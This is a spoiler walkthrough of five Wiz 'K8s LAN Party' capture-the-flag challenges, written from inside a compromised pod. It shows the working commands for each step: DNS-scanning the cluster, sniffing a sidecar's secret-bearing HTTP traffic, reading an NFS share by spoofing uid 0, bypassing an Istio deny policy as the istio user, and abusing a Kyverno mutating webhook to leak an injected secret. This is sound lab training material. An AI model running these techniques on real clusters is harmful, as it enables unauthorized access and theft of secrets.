Warning Spoilers!
This walkthrough goes over the 5 Kubernetes LAN Party challenges created by wiz.io.
This CTF focuses more on Kubernetes tooling implementations and Linux.
All the flags in the challenge follow the same format: wiz_k8s_lan_party{*}
Recon
You have shell access to compromised a Kubernetes pod at the bottom of this page, and your next objective is to compromise other internal services further. As a warmup, utilize DNS scanning to uncover hidden internal services and obtain the flag. We have “loaded your machine with dnscan to ease this process for further challenges.
Looking around we find ourselves in a pod (All challenges usually are)
Changing to the /var/run/secrets/kubernetes.io/serviceaccounts
directory we can find the namespace were running in
cd /var/run/secrets/kubernetes.io/serviceaccounts
cat namespace
# k8s-lan-party
Lets look at the usage of dnscan
dnscan --help
# Usage of dnscan:
# -subnet string
# Input to scan, CIDR notation (e.g., 10.5.0.0/24) or wildcard (e.g., 10.5.0.*)
env | grep HOST
# KUBERNETES_SERVICE_HOST=10.100.0.1
dnscan -subnet 10.100.0.0/16
# 10.100.241.254 -> flag.svc.cluster.local.
# 65536 / 65536 [-------------------------------------------------------------------------------] 100.00% 988 p/s
I wonder what this is 👀
curl 10.100.241.254
# wiz_k8s_lan_party{FLAG_GOES_HERE}
Finding Neighbours
Sometimes, it seems we are the only ones around, but we should always be on guard against invisible sidecars reporting sensitive secrets.
Running a tcpdump we can see traffic that the sidecar is making
tcpdump
Wait a little bit and we get the following logs
16:25:45.433018 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [S], seq 3171463156, win 64240, options [mss 1460,sackOK,TS val 3407852821 ecr 0,nop,wscale 7], length 0
16:25:45.433189 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [S.], seq 1180313456, ack 3171463157, win 65160, options [mss 1460,sackOK,TS val 2963764429 ecr 3407852821,nop,wscale 7], length 0
16:25:45.433198 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3407852821 ecr 2963764429], length 0
16:25:45.433237 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [P.], seq 1:215, ack 1, win 502, options [nop,nop,TS val 3407852821 ecr 2963764429], length 214: HTTP: POST / HTTP/1.1
16:25:45.433346 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [.], ack 215, win 508, options [nop,nop,TS val 2963764429 ecr 3407852821], length 0
16:25:45.435597 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [P.], seq 1:206, ack 215, win 508, options [nop,nop,TS val 2963764431 ecr 3407852821], length 205: HTTP: HTTP/1.1 200 OK
16:25:45.435604 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 206, win 501, options [nop,nop,TS val 3407852824 ecr 2963764431], length 0
16:25:45.435705 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [F.], seq 215, ack 206, win 501, options [nop,nop,TS val 3407852824 ecr 2963764431], length 0
16:25:45.435844 IP reporting-service.k8s-lan-party.svc.cluster.local.http > 192.168.7.169.57028: Flags [F.], seq 206, ack 216, win 508, options [nop,nop,TS val 2963764432 ecr 3407852824], length 0
16:25:45.435849 IP 192.168.7.169.57028 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [.], ack 207, win 501, options [nop,nop,TS val 3407852824 ecr 2963764432], length 0
Lets poke around and see if we can get any other info out of it
dig +short reporting-service.k8s-lan-party.svc.cluster.local A
# 10.100.171.123
nmap -T4 10.100.171.123
# ...
# Lots and lots of ports
Eventually I was stuck so I looked up if I could get full packages out of the tcpdump…
tcpdump -i any -s 0 'tcp port http' -A
# 16:32:31.470137 ns-12b555 Out IP 192.168.7.169.43222 > reporting-service.k8s-lan-party.svc.cluster.local.http: Flags [P.], seq 1:215, ack 1, win 502, options [nop,nop,TS val 3408258858 ecr 2964170466], length 214: HTTP: POST / HTTP/1.1
# E..
# ..@.........
# d.{...P.z...U.x.....-.....
# .%.*....POST / HTTP/1.1
# Host: reporting-service
# User-Agent: curl/7.64.0
# Accept: */*
# Content-Length: 63
# Content-Type: application/x-www-form-urlencoded
# wiz_k8s_lan_party{FLAG_GOES_HERE}
Data Leakage
The targeted big corp utilizes outdated, yet cloud-supported technology for data storage in production. But oh my, this technology was introduced in an era when access control was only network-based 🤦️.
Doing some quick enumeration
env
# ...
df -h
# Filesystem Size Used Avail Use% Mounted on
# overlay 300G 23G 278G 8% /
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ 8.0E 0 8.0E 0% /efs
# tmpfs 60G 12K 60G 1% /var/run/secrets/kubernetes.io/serviceaccount
# tmpfs 64M 0 64M 0% /dev/null
Hmmm efs?
ls -l / | grep efs
# drwxr-xr-x 2 root root 6144 Mar 11 11:43 efs
ls -l /efs
# ---------- 1 daemon daemon 73 Mar 11 13:52 flag.txt
cat /efs/flag.txt
# cat: /efs/flag.txt: Permission denied
dig fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com +short
# 192.168.124.98
Our user does not have permissions to mount volumes. :(
Some notes, none of these worked https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-efs-enum
player@wiz-k8s-lan-party:/efs$ mount | grep efs
# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/ on /efs type nfs4 (ro,relatime,vers=4.1,rsize=1048576,wsize=1048576,namlen=255,hard,noresvport,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=192.168.4.189,local_lock=none,addr=192.168.124.98)
nfs-ls nfs://192.168.124.98/
# Times out
Asked for a hint leads us to these two commands
Got stuck from this point so I found a writeup
https://github.com/sahlberg/libnfs
We I learned from that writeup is that a version number must be specified in the command. The version can be sourced from the mount command we ran earlier (vers=4.1)
nfs-ls nfs://192.168.124.98/?version=4.1
# ---------- 1 1 1 73 flag.txt
Now that we can finally view stuff lets try getting the contents of the file
# Version, user & group id must be specified
nfs-cat "nfs://192.168.124.98//flag.txt?version=4&uid=0"
# wiz_k8s_lan_party{FLAG_GOES_HERE}
Bypassing Boundaries
Apparently, new service mesh technologies hold unique appeal for ultra-elite users (root users). Don’t abuse this power; use it responsibly and with caution.
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: istio-get-flag
namespace: k8s-lan-party
spec:
action: DENY
selector:
matchLabels:
app: "{flag-pod-name}"
rules:
- from:
- source:
namespaces: ["k8s-lan-party"]
to:
- operation:
methods: ["POST", "GET"]
Lets poke around to see what exists on this pod
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# ...
# istio:x:1337:1337::/home/istio:/bin/sh
# player:x:1001:1001::/home/player:/bin/sh
The only think that is interesting is the istio & player users.
Poking around the pod I could not find much, we don’t have many permissions. Since this is a network related challenge lets run a dnscan on it.
# env shows IPs used by the cluster
dnscan -subnet 10.100.0.1/16
# 10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
Lets try to make GET/POST requests to the endpoint, they probably will fail tho
curl -X GET 10.100.224.159
# RBAC: access denied
The following GitHub ticket explains why the user can bypass the policy: https://github.com/istio/istio/issues/4286
TL;DR: If uid is the same as what is used in the route tables it bypasses the mesh network.
su istio
curl -X GET 10.100.224.159
# wiz_k8s_lan_party{FLAG_GOES_HERE}
Found a writeup that can explain it better than I can.
Lateral Movement
Where pods are being mutated by a foreign regime, one could abuse its bureaucracy and leak sensitive information from the administrative services.
apiVersion: kyverno.io/v1
kind: Policy
metadata:
name: apply-flag-to-env
namespace: sensitive-ns
spec:
rules:
- name: inject-env-vars
match:
resources:
kinds:
- Pod
mutate:
patchStrategicMerge:
spec:
containers:
- name: "*"
env:
- name: FLAG
value: "{flag}"
Lets start off with a network scan
dnscan --subnet 10.100.0.0/16
# 10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
# 10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
# 10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
# 10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
# 10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
# 10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.
Knowing how admission controllers generally work it helpful for this. When a request is made to the Kubernetes API server it is then forwarded to a validator/mutating webhook without authentication.
In our case it Kyverno (kyverno-svc.kyverno.svc.cluster.local
), if the pod matches the policy apply-flag-to-env
it will mutate the pod.
Lets create a sample AdmissionReview
object using kube-review based on a sample pod.
kubectl run foo --namespace sensitive-ns --image nginx -o yaml --dry-run=client | ./kube-review-darwin-arm64 create > pod.json
I put the json up on pastebin since I can’t paste to the web shell.
Now we can hit the endpoint with the pod and have it mutate it; adding the flag environment variable.
curl -X POST -H "Content-Type: application/json" --data @pod.json https://kyverno-svc.kyverno.svc.cluster.local/mutate -k | jq .
# ...
# In the response is the flag
curl -X POST -H "Content-Type: application/json" --data @pod.json https://kyverno-svc.kyverno.svc.cluster.local/mutate -k | jq -r .response.patch | base64 -d | jq -r '.[0].value[0].value'
# wiz_k8s_lan_party{FLAG_GOES_HERE}